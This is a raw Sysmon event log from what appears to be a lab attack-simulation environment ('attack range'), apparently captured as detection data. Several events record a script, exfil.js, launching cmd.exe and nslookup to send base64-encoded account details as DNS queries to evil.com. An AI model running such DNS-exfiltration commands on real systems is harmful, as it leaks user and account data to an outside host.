14:16:09.255{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.255{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.255{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.255{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-173E-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.255{2E1864BB-17A9-629A-153E-000000005F02}52725104C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-173E-000000005F02}7316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.266{2E1864BB-17A9-629A-173E-000000005F02}7316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-153E-000000005F02}5272C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlilt.tmp 2>&1 10341000x8000000000000000195044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.223{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-163E-000000005F02}4828C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.223{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A9-629A-163E-000000005F02}4828C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.223{2E1864BB-17A9-629A-163E-000000005F02}48287556C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-153E-000000005F02}5272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.207{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-163E-000000005F02}4828C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.207{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000043911Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:06.824{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52321-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000195039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.207{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.207{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.207{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.207{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-153E-000000005F02}5272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.207{2E1864BB-17A1-629A-783D-000000005F02}55522824C:\Windows\System32\WScript.exe{2E1864BB-17A9-629A-153E-000000005F02}5272C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.211{2E1864BB-17A9-629A-153E-000000005F02}5272C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlilt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000195033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.205{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldvg.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000195032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.155{2E1864BB-17A9-629A-133E-000000005F02}82668C:\Windows\system32\conhost.exe{2E1864BB-17A9-629A-143E-000000005F02}4672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.155{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.155{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.155{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A9-629A-143E-000000005F02}4672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000195028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.155{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.155{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000195026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.155{2E1864BB-17A9-629A-123E-000000005F02}19607376C:\Windows\system32\cmd.exe{2E1864BB-17A9-629A-143E-000000005F02}4672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000195025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:09.164{2E1864BB-17A9-629A-143E-000000005F02}4672C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A9-629A-123E-000000005F02}1960C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldvg.tmp 2>&1 354300x8000000000000000195024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.734{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52177- 354300x8000000000000000195023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.734{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52176- 354300x8000000000000000195022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.733{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52175- 354300x8000000000000000195021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.733{00000000-0000-0000-0000-000000000000}7352<unknown process>-udptruefalse127.0.0.1-52175-false127.0.0.1-53domain 354300x8000000000000000195020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.671{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52174- 354300x8000000000000000195019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.670{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52173- 354300x8000000000000000195018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.670{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52172- 354300x8000000000000000195017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.670{00000000-0000-0000-0000-000000000000}7224<unknown process>-udptruefalse127.0.0.1-52172-false127.0.0.1-53domain 354300x8000000000000000195016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.589{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52171- 354300x8000000000000000195015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52170- 354300x8000000000000000195014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52169- 354300x8000000000000000195013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.512{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52168- 354300x8000000000000000195012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.511{00000000-0000-0000-0000-000000000000}7380<unknown process>-udptruefalse127.0.0.1-52168-false127.0.0.1-53domain 354300x8000000000000000195011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.447{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52167- 354300x8000000000000000195010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.446{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52166- 